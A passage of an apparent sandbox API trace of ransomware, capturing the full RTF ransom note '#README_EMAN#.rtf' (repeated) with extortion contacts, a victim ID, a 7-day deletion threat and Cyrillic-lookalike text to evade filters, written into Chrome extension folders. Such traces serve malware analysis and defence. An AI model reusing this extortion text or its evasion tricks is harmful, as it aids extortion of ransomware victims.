;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.139] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.140] CloseHandle (hObject=0x2e8) returned 1 [0292.140] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#readme_eman#.rtf")) returned 0x20 [0292.140] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0292.140] GetLastError () returned 0x2 [0292.141] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 